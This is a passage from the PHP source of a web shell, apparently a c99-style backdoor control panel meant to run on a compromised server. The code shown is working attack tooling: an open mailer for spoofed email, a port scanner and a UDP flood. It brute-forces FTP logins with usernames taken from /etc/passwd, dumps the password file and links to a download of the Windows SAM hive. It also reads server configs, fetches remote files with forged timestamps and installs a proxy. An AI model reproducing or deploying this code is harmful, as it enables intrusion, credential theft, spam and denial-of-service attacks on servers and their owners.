<input type=submit value="Install"></form> | |
<?php | |
if ($_GET['install'] == 'yup') { | |
if (is_writable($_GET['path'])) { | |
cf($_GET['path'].'proxy.php', $phpproxy); | |
echo '<font color=green><b>proxy.php was created in '.htmlentities($_GET['path']).'</b></font>'; | |
chmod($_GET['path'].'/proxy.php', 0777); | |
}else{ | |
echo '<font color=red><b>Directory is not writable!</b><br></font>'; | |
} | |
} | |
} | |
if ($x == 'phptools'){ | |
?><center><?php | |
//mailer | |
echo '<b>Mailer</b><br> | |
<form action="'.$surl.'" method=GET> | |
<input type="hidden" name="act" value="phptools"> | |
<input type=text name=to value=to><br> | |
<input type=text name=from value=from><br> | |
<input type=text name=subject value=subject><br> | |
<input type=text name=body value=body><br> | |
<input type=submit name=submit value=Submit></form>'; | |
if (isset($_GET['to']) && isset($_GET['from']) && isset($_GET['subject']) && isset($_GET['body'])) { | |
$headers = 'From: '.$_GET['from']; | |
mail ($_GET['to'],$_GET['subject'],$_GET['body'],$headers); | |
echo 'Email sent.'; | |
} | |
//port scanner | |
echo '<br><b>Port Scanner</b><br>'; | |
$start = strip_tags($_GET['start']); | |
$end = strip_tags($_GET['end']); | |
$host = strip_tags($_GET['host']); | |
if(isset($_GET['host']) && is_numeric($_GET['end']) && is_numeric($_GET['start'])){ | |
for($i = $start; $i<=$end; $i++){ | |
$fp = @fsockopen($host, $i, $errno, $errstr, 3); | |
if($fp){ | |
echo 'Port '.$i.' is <font color=green>open</font><br>'; | |
} | |
flush(); | |
} | |
}else{ | |
?> | |
<form action="?" method="get"> | |
<input type="hidden" name="act" value="phptools"> | |
Host:<br /> | |
<input type="text" name="host" value="localhost"/><br /> | |
Port start:<br /> | |
<input type="text" name="start" value="0"/><br /> | |
Port end:<br /> | |
<input type="text" name="end" value="5000"/><br /> | |
<input type="submit" value="Scan Ports" /> | |
</form> | |
<?php | |
} | |
//UDP | |
if(isset($_GET['host'])&&is_numeric($_GET['time'])){ | |
$pakits = 0; | |
ignore_user_abort(TRUE); | |
set_time_limit(0); | |
$exec_time = $_GET['time']; | |
$time = time(); | |
//print "Started: ".time('h:i:s')."<br>"; | |
$max_time = $time+$exec_time; | |
$host = $_GET['host']; | |
for($i=0;$i<65000;$i++){ | |
$out .= 'X'; | |
} | |
while(1){ | |
$pakits++; | |
if(time() > $max_time){ | |
break; | |
} | |
$rand = rand(1,65000); | |
$fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5); | |
if($fp){ | |
fwrite($fp, $out); | |
fclose($fp); | |
} | |
} | |
echo "<br><b>UDP Flood</b><br>Completed with $pakits (" . round(($pakits*65)/1024, 2) . " MB) packets averaging ". round($pakits/$exec_time, 2) . " packets per second \n"; | |
echo '<br><br> | |
<form action="'.$surl.'" method=GET> | |
<input type="hidden" name="act" value="phptools"> | |
Host: <input type=text name=host value=localhost> | |
Length (seconds): <input type=text name=time value=9999> | |
<input type=submit value=Go></form>'; | |
}else{ echo '<br><b>UDP Flood</b><br> | |
<form action=? method=GET> | |
<input type="hidden" name="act" value="phptools"> | |
Host: <br><input type=text name=host value=localhost><br> | |
Length (seconds): <br><input type=text name=time value=9999><br> | |
<input type=submit value=Go></form>'; | |
} | |
?></center><?php | |
} | |
if ($x == "ftpquickbrute") { | |
echo "<center><table><tr><td class=barheader colspan=2>"; | |
echo ".: Ftp Quick Brute :.</td></tr>"; | |
echo "<tr><td>"; | |
if ($win) {echo "Couldn't run on Windows!";} | |
else { | |
function caftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) { | |
if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} | |
else {$TRUE = TRUE;} | |
if ($TRUE) { | |
$sock = @ftp_connect($host,$port,$timeout); | |
if (@ftp_login($sock,$login,$pass)) { | |
echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; | |
ob_flush(); | |
return TRUE; | |
} | |
} | |
} | |
if (!empty($submit)) { | |
if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} | |
$fp = fopen("/etc/passwd","r"); | |
if (!$fp) {echo "Can't get /etc/passwd for password-list.";} | |
else { | |
if ($fqb_logging) { | |
if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} | |
else {$fqb_logfp = FALSE;} | |
$fqb_log = "FTP Quick Brute (".$sh_name.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; | |
if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} | |
} | |
ob_flush(); | |
$i = $success = 0; | |
$ftpquick_st = getmicrotime(); | |
while(!feof($fp)) { | |
$str = explode(":",fgets($fp,2048)); | |
if (caftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) { | |
echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; | |
$fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; | |
if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} | |
$success++; | |
ob_flush(); | |
} | |
if ($i > $fqb_lenght) {break;} | |
$i++; | |
} | |
if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} | |
$ftpquick_t = round(getmicrotime()-$ftpquick_st,4); | |
echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; | |
$fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; | |
if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} | |
if ($fqb_logemail) {@mail($fqb_logemail,"".$sh_name." report",$fqb_log);} | |
fclose($fqb_logfp); | |
} | |
} | |
else { | |
$logfile = $tmpdir_logs."ca_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; | |
$logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); | |
echo "<form action=\"".$surl."\"><input type=hidden name=x value=\"ftpquickbrute\">". | |
"Read first:</td><td><input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"></td></tr>". | |
"<tr><td></td><td><input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"> Users only with shell</td></tr>". | |
"<tr><td></td><td><input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked>Logging</td></tr>". | |
"<tr><td>Logging to file:</td><td><input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"></td></tr>". | |
"<tr><td>Logging to e-mail:</td><td><input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"></td></tr>". | |
"<tr><td colspan=2><input type=submit name=submit value=\"Brute\"></form>"; | |
} | |
echo "</td></tr></table></center>"; | |
} | |
} | |
if ($x == "d") { | |
if (!is_dir($d)) { echo "<center><b>$d is a not a Directory!</b></center>"; } | |
else { | |
echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; | |
if (!$win) { | |
echo "<tr><td><b>Owner/Group</b></td><td> "; | |
$ow = posix_getpwuid(fileowner($d)); | |
$gr = posix_getgrgid(filegroup($d)); | |
$row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); | |
} | |
echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."x=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table>"; | |
} | |
} | |
if ($x == "phpinfo") {@ob_clean(); phpinfo(); capriv8exit();} | |
if ($x == "security") { | |
echo "<div class=barheader>.: Server Security Information :.</div>". | |
"<table>". | |
"<tr><td>Open Base Dir</td><td>".$hopenbasedir."</td></tr>"; | |
echo "<td>Password File</td><td>"; | |
if (!$win) { | |
if ($nixpasswd) { | |
if ($nixpasswd == 1) {$nixpasswd = 0;} | |
echo "*nix /etc/passwd:<br>"; | |
if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} | |
if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} | |
echo "<form action=\"".$surl."\"><input type=hidden name=x value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b> <input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\"> <b>To:</b> <input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\"> <input type=submit value=\"View\"></form><br>"; | |
$i = $nixpwd_s; | |
while ($i < $nixpwd_e) { | |
$uid = posix_getpwuid($i); | |
if ($uid) { | |
$uid["dir"] = "<a href=\"".$surl."x=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; | |
echo join(":",$uid)."<br>"; | |
} | |
$i++; | |
} | |
} | |
else {echo "<a href=\"".$surl."x=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a>";} | |
} | |
else { | |
$v = $_SERVER["WINDIR"]."\repair\sam"; | |
if (file_get_contents($v)) {echo "<td colspan=2><div class=fxerrmsg>You can't crack Windows passwords(".$v.")</div></td></tr>"; } | |
else {echo "You can crack Windows passwords. <a href=\"".$surl."x=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ?.</td></tr>";} | |
} | |
echo "</td></tr>"; | |
echo "<tr><td>Config Files</td><td>"; | |
if (!$win) { | |
$v = array( | |
array("User Domains","/etc/userdomains"), | |
array("Cpanel Config","/var/cpanel/accounting.log"), | |
array("Apache Config","/usr/local/apache/conf/httpd.conf"), | |
array("Apache Config","/etc/httpd.conf"), | |
array("Syslog Config","/etc/syslog.conf"), | |
array("Message of The Day","/etc/motd"), | |
array("Hosts","/etc/hosts") | |
); | |
$sep = "/"; | |
} | |
else { | |
$windir = $_SERVER["WINDIR"]; | |
$etcdir = $windir . "\system32\drivers\etc\\"; | |
$v = array( | |
array("Hosts",$etcdir."hosts"), | |
array("Local Network Map",$etcdir."networks"), | |
array("LM Hosts",$etcdir."lmhosts.sam"), | |
); | |
$sep = "\\"; | |
} | |
foreach ($v as $sec_arr) { | |
$sec_f = substr(strrchr($sec_arr[1], $sep), 1); | |
$sec_d = rtrim($sec_arr[1],$sec_f); | |
$sec_full = $sec_d.$sec_f; | |
$sec_d = rtrim($sec_d,$sep); | |
if (file_get_contents($sec_full)) { | |
echo " [ <a href=\"".$surl."x=f&f=$sec_f&d=".urlencode($sec_d)."&ft=txt\"><u><b>".$sec_arr[0]."</b></u></a> ] "; | |
} | |
} | |
echo "</td></tr>"; | |
function displaysecinfo($name,$value) { | |
if (!empty($value)) { | |
echo "<tr><td>".$name."</td><td><pre>".wordwrap($value,100)."</pre></td></tr>"; | |
} | |
} | |
if (!$win) { | |
displaysecinfo("OS Version",myshellexec("cat /proc/version")); | |
displaysecinfo("Kernel Version",myshellexec("sysctl -a | grep version")); | |
displaysecinfo("Distrib Name",myshellexec("cat /etc/issue.net")); | |
displaysecinfo("Distrib Name (2)",myshellexec("cat /etc/*-realise")); | |
displaysecinfo("CPU Info",myshellexec("cat /proc/cpuinfo")); | |
displaysecinfo("RAM",myshellexec("free -m")); | |
displaysecinfo("HDD Space",myshellexec("df -h")); | |
displaysecinfo("List of Attributes",myshellexec("lsattr -a")); | |
displaysecinfo("Mount Options",myshellexec("cat /etc/fstab")); | |
displaysecinfo("cURL installed?",myshellexec("which curl")); | |
displaysecinfo("lynx installed?",myshellexec("which lynx")); | |
displaysecinfo("links installed?",myshellexec("which links")); | |
displaysecinfo("fetch installed?",myshellexec("which fetch")); | |
displaysecinfo("GET installed?",myshellexec("which GET")); | |
displaysecinfo("perl installed?",myshellexec("which perl")); | |
displaysecinfo("Where is Apache?",myshellexec("whereis apache")); | |
displaysecinfo("Where is perl?",myshellexec("whereis perl")); | |
displaysecinfo("Locate proftpd.conf",myshellexec("locate proftpd.conf")); | |
displaysecinfo("Locate httpd.conf",myshellexec("locate httpd.conf")); | |
displaysecinfo("Locate my.conf",myshellexec("locate my.conf")); | |
displaysecinfo("Locate psybnc.conf",myshellexec("locate psybnc.conf")); | |
} | |
else { | |
displaysecinfo("OS Version",myshellexec("ver")); | |
displaysecinfo("Account Settings",myshellexec("net accounts")); | |
} | |
echo "</table>\n"; | |
} | |
if ($x == "mkfile") { | |
if ($mkfile != $d) { | |
if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object already exists!";} | |
elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied!";} | |
else {$x = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} | |
} | |
else {$x = $dspact = "ls";} | |
} | |
if ($x == "encoder") { | |
echo "<script language=\"javascript\">function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script>". | |
"<form name=\"encoder\" action=\"".$surl."\" method=POST>". | |
"<input type=hidden name=x value=encoder>". | |
"<center><table class=contents>". | |
"<tr><td colspan=4 class=barheader>.: Encoder :.</td>". | |
"<tr><td colspan=2>Input:</td><td><textarea name=\"encoder_input\" id=\"input\" cols=70 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br>". | |
"<input type=submit value=\"calculate\"></td></tr>". | |
"<tr><td rowspan=4>Hashes:</td>"; | |
foreach(array("md5","crypt","sha1","crc32") as $v) { | |
echo "<td>".$v.":</td><td><input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly></td></tr><tr>"; | |
} | |
echo "</tr>". | |
"<tr><td rowspan=2>Url:</td>". | |
"<td>urlencode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly></td></tr>". | |
"<tr><td>urldecode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly></td></tr>". | |
"<tr><td rowspan=2>Base64:</td>". | |
"<td>base64_encode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></td></tr>". | |
"<tr><td>base64_decode:</td><td>"; | |
if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"Failed!\" disabled readonly>";} | |
else { | |
$debase64 = base64_decode($encoder_input); | |
$debase64 = str_replace("\0","[0]",$debase64); | |
$a = explode("\r\n",$debase64); | |
$rows = count($a); | |
$debase64 = htmlspecialchars($debase64); | |
if ($rows == 1) { echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>"; } | |
else { $rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>"; } | |
echo " <a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\">[Send to input]</a>"; | |
} | |
echo "</td></tr>". | |
"<tr><td>Base convertations:</td><td>dec2hex</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; | |
$c = strlen($encoder_input); | |
for($i=0;$i<$c;$i++) { | |
$hex = dechex(ord($encoder_input[$i])); | |
if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} | |
elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} | |
} | |
echo "\" readonly></td></tr><tr><td>Online md5 , sha1 , mysql password cracker<td><a href=\"http://passcracking.com\" target=_blank>Enter</a></td></tr></table></center></form>"; | |
} | |
if ($x == "fsbuff") { | |
$arr_copy = $sess_data["copy"]; | |
$arr_cut = $sess_data["cut"]; | |
$arr = array_merge($arr_copy,$arr_cut); | |
if (count($arr) == 0) {echo "<h2><center>Buffer is empty!</center></h2>";} | |
else { | |
$fx_infohead = "File-System Buffer"; | |
$ls_arr = $arr; | |
$disp_fullpath = TRUE; | |
$x = "ls"; | |
} | |
} | |
if ($x == "selfremove") { | |
if (($submit == $rndcode) and ($submit != "")) { | |
if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using ".$sh_name."!"; capriv8exit(); } | |
else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} | |
} | |
else { | |
if (!empty($rndcode)) {echo "<b>Error: incorrect confirmation!</b>";} | |
$rnd = rand(0,9).rand(0,9).rand(0,9); | |
echo "<form action=\"".$surl."\"><input type=hidden name=x value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>: <input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit> <input type=submit value=\"YES\"></form>"; | |
} | |
} | |
if ($x == "search") { | |
echo "<div class=barheader>.: $sh_name File-System Search :.</div>"; | |
if (empty($search_in)) {$search_in = $d;} | |
if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} | |
if (empty($search_text_wwo)) {$search_text_regexp = 0;} | |
if (!empty($submit)) { | |
$found = array(); | |
$found_d = 0; | |
$found_f = 0; | |
$search_i_f = 0; | |
$search_i_d = 0; | |
$a = array( | |
"name"=>$search_name, | |
"name_regexp"=>$search_name_regexp, | |
"text"=>$search_text, | |
"text_regexp"=>$search_text_regxp, | |
"text_wwo"=>$search_text_wwo, | |
"text_cs"=>$search_text_cs, | |
"text_not"=>$search_text_not | |
); | |
$searchtime = getmicrotime(); | |
$in = array_unique(explode(";",$search_in)); | |
foreach($in as $v) {cafsearch($v);} | |
$searchtime = round(getmicrotime()-$searchtime,4); | |
if (count($found) == 0) {echo "No files found!";} | |
else { | |
$ls_arr = $found; | |
$disp_fullpath = TRUE; | |
$x = "ls"; | |
} | |
} | |
echo "<table class=contents>". | |
"<tr><td><form method=POST>". | |
"<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=x value=\"".$dspact."\">". | |
"File or folder Name:</td><td><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\"> <input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - Regular Expression</td></tr>". | |
"<tr><td>Look in (Separate by \";\"):</td><td><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"></td></tr>". | |
"<tr><td>A word or phrase in the file:</td><td><textarea name=\"search_text\" cols=\"50\" rows=\"5\">".htmlspecialchars($search_text)."</textarea></td></tr>". | |
"<tr><td></td><td><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> Regular Expression". | |
" <input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> Whole words only". | |
" <input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> Case sensitive". | |
" <input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> Find files NOT containing the text</td></tr>". | |
"<tr><td></td><td><input type=submit name=submit value=\"Search\"></form></td></tr>". | |
"</table>"; | |
if ($x == "ls") { | |
$dspact = $x; | |
echo "Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b>". | |
"<hr size=\"1\" noshade>"; | |
} | |
} | |
if ($x == "chmod") { | |
$mode = fileperms($d.$f); | |
if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} | |
else { | |
$form = TRUE; | |
if ($chmod_submit) | |
{ | |
$octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); | |
if (chmod($d.$f,$octet)) {$x = "ls"; $form = FALSE; $err = "";} | |
else {$err = "Can't chmod to ".$octet.".";} | |
} | |
if ($form) | |
{ | |
$perms = parse_perms($mode); | |
echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=x value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"")."> Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"")."> Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"")."> Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; | |
} | |
} | |
} | |
if ($x == "upload") { | |
$uploadmess = ""; | |
$uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); | |
if (empty($uploadpath)) {$uploadpath = $d;} | |
elseif (substr($uploadpath,-1) != DIRECTORY_SEPARATOR) {$uploadpath .= DIRECTORY_SEPARATOR;} | |
if (!empty($submit)) { | |
global $_FILES; | |
$uploadfile = $_FILES["uploadfile"]; | |
if (!empty($uploadfile["tmp_name"])) { | |
if (empty($uploadfilename)) {$destin = $uploadfile["name"];} | |
else {$destin = $userfilename;} | |
if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) { | |
$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>"; | |
} | |
else { $uploadmess .= "File uploaded successfully!<br>".$uploadpath.$destin; } | |
} | |
elseif (!empty($uploadurl)) { | |
if (!empty($uploadfilename)) {$destin = $uploadfilename;} | |
else { | |
$destin = explode("/",$destin); | |
$destin = $destin[count($destin)-1]; | |
if (empty($destin)) { | |
$i = 0; | |
$b = ""; | |
while(file_exists($uploadpath.$destin)) { | |
if ($i > 0) {$b = "_".$i;} | |
$destin = "upload".$b; | |
$i++; | |
} | |
} | |
} | |
if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorrect URL!</b>";} | |
else { | |
$st = getmicrotime(); | |
$content = @file_get_contents($uploadurl); | |
$dt = round(getmicrotime()-$st,4); | |
if (!$content) {$uploadmess .= "Can't download file!";} | |
else { | |
if ($filestealth) {$stat = stat($uploadpath.$destin);} | |
$fp = fopen($uploadpath.$destin,"w"); | |
if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} | |
else { | |
fwrite($fp,$content,strlen($content)); | |
fclose($fp); | |
if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} | |
$uploadmess .= "File saved from ".$uploadurl." !"; | |
} | |
} | |
} | |
} | |
else { echo "No file to upload!"; } | |
} | |
if ($miniform) { | |
echo "<b>".$uploadmess."</b>"; | |
$x = "ls"; | |
} | |
else { | |
echo "<table><tr><td colspan=2 class=barheader>". | |
".: File Upload :.</td>". | |
"<td colspan=2>".$uploadmess."</td></tr>". | |
"<tr><td><form enctype=\"multipart/form-data\" action=\"".$surl."x=upload&d=".urlencode($d)."\" method=POST>". | |
"From Your Computer:</td><td><input name=\"uploadfile\" type=\"file\"></td></tr>". | |
"<tr><td>From URL:</td><td><input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"></td></tr>". | |
"<tr><td>Target Directory:</td><td><input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"></td></tr>". | |
"<tr><td>Target File Name:</td><td><input name=uploadfilename size=25></td></tr>". | |
"<tr><td></td><td><input type=checkbox name=uploadautoname value=1 id=df4> Convert file name to lowercase</td></tr>". | |
"<tr><td></td><td><input type=submit name=submit value=\"Upload\">". | |
"</form></td></tr></table>"; | |
} | |
} | |
if ($x == "delete") { | |
$delerr = ""; | |
foreach ($actbox as $v) { | |
$result = FALSE; | |
$result = fs_rmobj($v); | |
if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} | |
} | |
if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} | |
$x = "ls"; | |
} | |
if (!$usefsbuff) { | |
if (($x == "paste") or ($x == "copy") or ($x == "cut") or ($x == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$usefsbuff\" as TRUE.</center>";} | |
} | |
else { | |
if ($x == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); ca_sess_put($sess_data); $x = "ls"; } | |
elseif ($x == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); ca_sess_put($sess_data); $x = "ls";} | |
elseif ($x == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} ca_sess_put($sess_data); $x = "ls";} | |
if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); ca_sess_put($sess_data);} | |
elseif ($actpastebuff) { | |
$psterr = ""; | |
foreach($sess_data["copy"] as $k=>$v) { | |
$to = $d.basename($v); | |
if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} | |
if ($copy_unset) {unset($sess_data["copy"][$k]);} | |
} | |
foreach($sess_data["cut"] as $k=>$v) { | |
$to = $d.basename($v); | |
if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} | |
unset($sess_data["cut"][$k]); | |
} | |
ca_sess_put($sess_data); | |
if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} | |
$x = "ls"; | |
} | |
elseif ($actarcbuff) { | |
$arcerr = ""; | |
if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} | |
else {$ext = ".tar.gz";} | |
if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} | |
$cmdline .= " ".$actarcbuff_path; | |
$objects = array_merge($sess_data["copy"],$sess_data["cut"]); | |
foreach($objects as $v) { | |
$v = str_replace("\\",DIRECTORY_SEPARATOR,$v); | |
if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} | |
if (is_dir($v)) { | |
if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} | |
$v .= "*"; | |
} | |
$cmdline .= " ".$v; | |
} | |
$tmp = realpath("."); | |
chdir($d); | |
$ret = myshellexec($cmdline); | |
chdir($tmp); | |
if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} | |
$ret = str_replace("\r\n","\n",$ret); | |
$ret = explode("\n",$ret); | |
if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} | |
foreach($sess_data["cut"] as $k=>$v) { | |
if (in_array($v,$ret)) {fs_rmobj($v);} | |
unset($sess_data["cut"][$k]); | |
} | |
ca_sess_put($sess_data); | |
if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} | |
$x = "ls"; | |
} | |
elseif ($actpastebuff) { | |
$psterr = ""; | |
foreach($sess_data["copy"] as $k=>$v) { | |
$to = $d.basename($v); | |
if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} | |
if ($copy_unset) {unset($sess_data["copy"][$k]);} | |
} | |
foreach($sess_data["cut"] as $k=>$v) { | |
$to = $d.basename($v); | |
if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} | |
unset($sess_data["cut"][$k]); | |
} | |
ca_sess_put($sess_data); | |
